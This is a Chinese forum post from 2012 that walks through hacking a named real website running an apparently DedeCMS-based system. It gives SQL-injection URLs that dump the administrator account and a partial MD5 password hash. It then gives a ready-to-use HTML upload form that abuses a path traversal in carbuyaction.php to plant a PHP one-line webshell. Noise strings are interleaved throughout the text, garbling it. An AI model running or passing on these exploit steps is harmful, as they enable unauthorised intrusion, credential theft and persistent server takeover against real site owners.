①注入漏洞。- p7 i. F8 S7 t' D0 R) D, x
这站 http://www.political-security.com/) W3 |; n* |, m3 j
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,. n+ A: e, |% C
www.political-security.com/data/mysql_error_trace.inc 爆后台- N( I# p, B" S6 O7 L( \& I* m# J
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
" H! J/ M! e* d0 c然后写上语句
7 x f! Z) G9 v ^9 {. u- Q查看管理员帐号: c* Z" j5 I6 H; O* e, o; x
http://www.political-security.co ... &membergroup=@`
! z1 h" a( P- K, \
. V" p' _2 [# D5 z' O* v& G* oadmin
$ _. e$ s c0 a: J+ L+ `
) M" B) |) ]. a- a) Y% I% V7 P, f查看管理员密码( T9 r/ S3 J. Q# J0 v
http://www.political-security.co ... &membergroup=@`
n/ @: E7 f) |, L9 ?2 _; o5 A7 |. v0 |- I( c% e& S$ m
8d29b1ef9f8c5a5af429- Y: Q2 z; [+ P4 n' q7 U
# Q7 f/ u- P7 [, x
查看管理员密码
) X1 o& C. |& a
) r5 X0 o1 z! r* r7 h- A# q- W得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
{" q6 \/ y0 V8 Q- o! l1 {8 B: A8 o1 m
8d2
! c3 }) s, n# M) I9b1ef9f8c5a5af42+ X2 I1 K: D# y; ]2 K
9
, y+ y+ {$ Y; B* P7 N: ^
* K- c7 K- ?- |7 K; M0 o2 fcmd5没解出来 只好测试第二个方法
6 \" B% o- y d: @7 Z, u( L. v$ M& U7 x
& n4 i1 t( ?4 Z: Y4 c/ M
②上传漏洞:
2 a; w1 q' ~4 j# U, X% [
& ?2 V! U0 ~' L" x9 h, @9 _4 c只要登陆会员中心,然后访问页面链接. x8 Z4 ~# y( J+ g& u2 C
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”8 |2 R2 f3 q% G2 v# l' v0 ]) n0 H: R
8 S- R, R. M" o' X, E如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
# ~( [7 j" o/ Z; R, V) Z
, h) V' h) c7 e于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm) ?- @0 S& `' }' ^' B
, W8 N5 i; s% N) t% [% @( L2 o<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>/ y1 W, Q% M1 Y% \+ N) B, \4 f" m S
或者
" y, C4 g" n) Q+ {2 W# l( \即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对